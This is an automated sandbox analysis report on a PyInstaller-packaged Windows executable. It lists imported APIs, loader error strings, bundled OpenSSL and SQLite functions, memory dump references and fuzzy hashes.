PyUnicode_Decode, xrefs: 00007FF6BA3A5EF1, 00007FF6BA3A5F13
PyConfig_SetString, xrefs: 00007FF6BA3A5A45, 00007FF6BA3A5A67
PyEval_EvalCode, xrefs: 00007FF6BA3A5BB5, 00007FF6BA3A5BD7
PyUnicode_FromString, xrefs: 00007FF6BA3A5F7B, 00007FF6BA3A5F9D
Py_InitializeFromConfig, xrefs: 00007FF6BA3A5903, 00007FF6BA3A5925
PyRun_SimpleStringFlags, xrefs: 00007FF6BA3A5E0B, 00007FF6BA3A5E2D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6BA3A5DDD, 00007FF6BA3A5DFF
PyObject_SetAttrString, xrefs: 00007FF6BA3A5D81, 00007FF6BA3A5DA3
PyObject_GetAttrString, xrefs: 00007FF6BA3A5D53, 00007FF6BA3A5D75
PyUnicode_DecodeFSDefault, xrefs: 00007FF6BA3A5F1F, 00007FF6BA3A5F41
PyErr_Clear, xrefs: 00007FF6BA3A5AA1, 00007FF6BA3A5AC3
PyErr_Restore, xrefs: 00007FF6BA3A5B87, 00007FF6BA3A5BA9
PyUnicode_FromFormat, xrefs: 00007FF6BA3A5F4D, 00007FF6BA3A5F6F
Py_ExitStatusException, xrefs: 00007FF6BA3A58AA, 00007FF6BA3A58CC
PyObject_CallFunction, xrefs: 00007FF6BA3A5CF7, 00007FF6BA3A5D19
PyUnicode_AsUTF8, xrefs: 00007FF6BA3A5EC3, 00007FF6BA3A5EE5
Py_Finalize, xrefs: 00007FF6BA3A58D5, 00007FF6BA3A58F7
PyImport_AddModule, xrefs: 00007FF6BA3A5BE3, 00007FF6BA3A5C05
PyMarshal_ReadObjectFromString, xrefs: 00007FF6BA3A5C6D, 00007FF6BA3A5C8F
PySys_SetObject, xrefs: 00007FF6BA3A5E95, 00007FF6BA3A5EB7
PyUnicode_Replace, xrefs: 00007FF6BA3A5FD7, 00007FF6BA3A5FF9
Py_DecRef, xrefs: 00007FF6BA3A5836, 00007FF6BA3A5858

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: a7bdb1486f0234e0303d3add4b3b2ed7e4a09d5202b0bc22dd93af5543ed65ed
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: CA22BE74A09B37A1FA549F6DAC145B863A5BF14781F4890B6DE2EC2260FF3CB589C350

Function 00007FF6BA3A76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BA3A76D7
GetLastError.KERNEL32 ref: 00007FF6BA3A76E9
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7725
GetLastError.KERNEL32 ref: 00007FF6BA3A7737
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7750
GetLastError.KERNEL32 ref: 00007FF6BA3A7762
GetProcAddress.KERNEL32 ref: 00007FF6BA3A777B
GetLastError.KERNEL32 ref: 00007FF6BA3A778D
GetProcAddress.KERNEL32 ref: 00007FF6BA3A77A9
GetLastError.KERNEL32 ref: 00007FF6BA3A77BB
GetProcAddress.KERNEL32 ref: 00007FF6BA3A77D7
GetLastError.KERNEL32 ref: 00007FF6BA3A77E9
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7805
GetLastError.KERNEL32 ref: 00007FF6BA3A7817
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7833
GetLastError.KERNEL32 ref: 00007FF6BA3A7845
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7861
GetLastError.KERNEL32 ref: 00007FF6BA3A7873

Strings

Tcl_EvalFile, xrefs: 00007FF6BA3A7B93, 00007FF6BA3A7BB5
Tcl_FinalizeThread, xrefs: 00007FF6BA3A77CD, 00007FF6BA3A77EF
Tcl_EvalObjv, xrefs: 00007FF6BA3A7BEF, 00007FF6BA3A7C11
Tcl_NewByteArrayObj, xrefs: 00007FF6BA3A7B09, 00007FF6BA3A7B2B
Tk_GetNumMainWindows, xrefs: 00007FF6BA3A7CA7, 00007FF6BA3A7CC9
Tk_Init, xrefs: 00007FF6BA3A7C79, 00007FF6BA3A7C9B
Tcl_GetObjResult, xrefs: 00007FF6BA3A7B65, 00007FF6BA3A7B87
Tcl_DoOneEvent, xrefs: 00007FF6BA3A7771, 00007FF6BA3A7793
GetProcAddress, xrefs: 00007FF6BA3A76FF
Tcl_MutexUnlock, xrefs: 00007FF6BA3A78E1, 00007FF6BA3A7903
Tcl_MutexLock, xrefs: 00007FF6BA3A78B3, 00007FF6BA3A78D5
Failed to get address for %hs, xrefs: 00007FF6BA3A76F8
Tcl_Finalize, xrefs: 00007FF6BA3A779F, 00007FF6BA3A77C1
Tcl_ConditionFinalize, xrefs: 00007FF6BA3A793D, 00007FF6BA3A795F
Tcl_ConditionNotify, xrefs: 00007FF6BA3A796B, 00007FF6BA3A798D
Tcl_DeleteInterp, xrefs: 00007FF6BA3A77FB, 00007FF6BA3A781D
Tcl_ThreadAlert, xrefs: 00007FF6BA3A79F5, 00007FF6BA3A7A17
Tcl_ThreadQueueEvent, xrefs: 00007FF6BA3A79C7, 00007FF6BA3A79E9
Tcl_Alloc, xrefs: 00007FF6BA3A7C1D, 00007FF6BA3A7C3F
Tcl_GetCurrentThread, xrefs: 00007FF6BA3A7857, 00007FF6BA3A7879
Tcl_CreateInterp, xrefs: 00007FF6BA3A771B, 00007FF6BA3A773D
Tcl_GetVar2, xrefs: 00007FF6BA3A7A23, 00007FF6BA3A7A45
Tcl_ConditionWait, xrefs: 00007FF6BA3A7999, 00007FF6BA3A79BB
Tcl_NewStringObj, xrefs: 00007FF6BA3A7ADB, 00007FF6BA3A7AFD
Tcl_FindExecutable, xrefs: 00007FF6BA3A7746, 00007FF6BA3A7768
Tcl_Free, xrefs: 00007FF6BA3A7C4B, 00007FF6BA3A7C6D
Tcl_CreateThread, xrefs: 00007FF6BA3A7829, 00007FF6BA3A784B
Tcl_CreateObjCommand, xrefs: 00007FF6BA3A7A7F, 00007FF6BA3A7AA1
Tcl_EvalEx, xrefs: 00007FF6BA3A7BC1, 00007FF6BA3A7BE3
Tcl_JoinThread, xrefs: 00007FF6BA3A7885, 00007FF6BA3A78A7
Tcl_SetVar2, xrefs: 00007FF6BA3A7A51, 00007FF6BA3A7A73
Tcl_Init, xrefs: 00007FF6BA3A76D0, 00007FF6BA3A76EF
Tcl_MutexFinalize, xrefs: 00007FF6BA3A790F, 00007FF6BA3A7931
Tcl_SetVar2Ex, xrefs: 00007FF6BA3A7B37, 00007FF6BA3A7B59
Tcl_GetString, xrefs: 00007FF6BA3A7AAD, 00007FF6BA3A7ACF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 403f487d16009621e611950588cee078c0f027d9c92fe24547de69073f600d01
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: C902A420E0DB27A1EE559F6DEC505B86365BF14785F4441B6EE2EC2260FF3CB58A8350

Function 00007FF6BA3A81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6BA3A86B7,?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A822C

Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6BA3A8240
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6BA3A8373
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6BA3A829D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6BA3A8203
%.*s, xrefs: 00007FF6BA3A830C
\, xrefs: 00007FF6BA3A8261
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6BA3A82D9
CreateDirectory, xrefs: 00007FF6BA3A837C

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction ID: 44c63cebad8f291ccd3b0504a1ed5e2fc3168f2a865abfc5fe4a7bbc9c259f30
Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction Fuzzy Hash: FB517021A2DA6291FF609B2DE8552BE63A2EF94780F4444B1EF4EC26D5FE3CE5058740

Function 00007FF6BA3A1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

fopen, xrefs: 00007FF6BA3A1663
Failed to create symbolic link %s!, xrefs: 00007FF6BA3A1622
malloc, xrefs: 00007FF6BA3A1749
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6BA3A16A2
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6BA3A1742
fseek, xrefs: 00007FF6BA3A16E1
Failed to extract %s: failed to open target file!, xrefs: 00007FF6BA3A165C
fread, xrefs: 00007FF6BA3A17E6
fwrite, xrefs: 00007FF6BA3A17D1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6BA3A16DA
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6BA3A17CA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6BA3A17DF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 5687553188da95979e1850d39e0540597c2748fb5fd92a7858fdb41ee8a10d46
Instruction ID: dd905067492a88bd85427228c1cedd38a612935110789a2ef753ec50ea3772f5
Opcode Fuzzy Hash: 5687553188da95979e1850d39e0540597c2748fb5fd92a7858fdb41ee8a10d46
Instruction Fuzzy Hash: 6451B021B08B6792EE109B59D8401BD6392BF80794F8446B2EF0CC77E6EF3CE5958300

Function 00007FFDFAAC5880 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAAC58B8
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAAC58E9

Strings

SUITEB128ONLY, xrefs: 00007FFDFAAC58A6
SUITEB128C2, xrefs: 00007FFDFAAC58DC
ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDFAAC59D1
SUITEB128, xrefs: 00007FFDFAAC590F
ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDFAAC59D8, 00007FFDFAAC59E8
ECDHE-ECDSA-AES128-GCM-SHA256, xrefs: 00007FFDFAAC59F4
check_suiteb_cipher_list, xrefs: 00007FFDFAAC5989
..\s\ssl\ssl_ciph.c, xrefs: 00007FFDFAAC5995
SUITEB192, xrefs: 00007FFDFAAC593D

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
API String ID: 4069847057-1099454403
Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
Instruction ID: ce4cddf05b97dc1ef2f57b020408366fd35645082145d65fef6fa922e7069eac
Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
Instruction Fuzzy Hash: 7F41A231B08A0396F7188B51E870B7833A4FB44B94F8145B6EA2E837D9DF2DE595C700

Function 00007FFDFB0FB0C0 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB0FB1C3
00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB0FB2A4

Strings

?, xrefs: 00007FFDFB0FB2B8
zeroblob(%d), xrefs: 00007FFDFB0FB460
'%.*q', xrefs: 00007FFDFB0FB415
%lld, xrefs: 00007FFDFB0FB361
NULL, xrefs: 00007FFDFB0FB32D
%!.15g, xrefs: 00007FFDFB0FB37E
-- , xrefs: 00007FFDFB0FB153, 00007FFDFB0FB172
%02x, xrefs: 00007FFDFB0FB4C4

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
API String ID: 2142204133-875588658
Opcode ID: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
Instruction ID: 5bbb42e45e47f0f788376f955e8009fa88919fcb1a0769f4dbfc3839eda98a70
Opcode Fuzzy Hash: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
Instruction Fuzzy Hash: 50E16F76F0A69389FB21CB64D460BBC2BA0EB06748F444135DE2E56AEDDF3CA445DB40

Function 00007FFDFB117760 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB117AD2

Strings

cannot add a STORED column, xrefs: 00007FFDFB117A72
Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFB1178ED
SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFB117C5C
Cannot add a column with non-constant default, xrefs: 00007FFDFB117969
Cannot add a PRIMARY KEY column, xrefs: 00007FFDFB117881
UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFB117B14
Cannot add a UNIQUE column, xrefs: 00007FFDFB11789C
SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFB1178F7, 00007FFDFB117973, 00007FFDFB117A81
Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFB11790F

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
API String ID: 2142204133-200680935
Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
Instruction ID: 1b11e0b50b6f3011658864684eda2090ea5d92b4248e7ec2ea4e07d8665c16e4
Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
Instruction Fuzzy Hash: 15E18EA2B0AA8395EB258B15E164BB927A5FB44B88F145135DE6D077EEDF3CE448C300

Function 00007FFDFAAB1A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF32B6
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF32D7
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF32F8
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF3319
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF3336
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF3353
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF3370
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF338D

Strings

ssl_srp_ctx_init_intern, xrefs: 00007FFDFAAF342D
..\s\ssl\tls_srp.c, xrefs: 00007FFDFAAF33C3, 00007FFDFAAF3402, 00007FFDFAAF3436, 00007FFDFAAF3454, 00007FFDFAAF346D

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
API String ID: 3568877910-1794268454
Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction ID: a86e59c7eb4f1034104054a7054be78871c8166e42ff57dfb8bedf1f13c6144b
Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction Fuzzy Hash: 66918422B1AFC281FB9DDB25D460BB83390EF44B44F585675DE7C0B299DF28E5958320

Function 00007FF6BA3A2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6BA3A21AB
SelectObject.GDI32 ref: 00007FF6BA3A21F2
DrawTextW.USER32 ref: 00007FF6BA3A2215
SelectObject.GDI32 ref: 00007FF6BA3A222B
ReleaseDC.USER32 ref: 00007FF6BA3A223B
MoveWindow.USER32 ref: 00007FF6BA3A228B
MoveWindow.USER32 ref: 00007FF6BA3A22CB
MoveWindow.USER32 ref: 00007FF6BA3A231E
MoveWindow.USER32 ref: 00007FF6BA3A2366

Strings

P%, xrefs: 00007FF6BA3A21FF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 1bbb9a030e9cd5e1b7226f60d0ce1c917b999c91af7ede5880acc2d63f03158f
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 2E51D626608BB186D6249F26E4581BAB7A1F798B62F004135EFDEC3694EF3CD085DB10

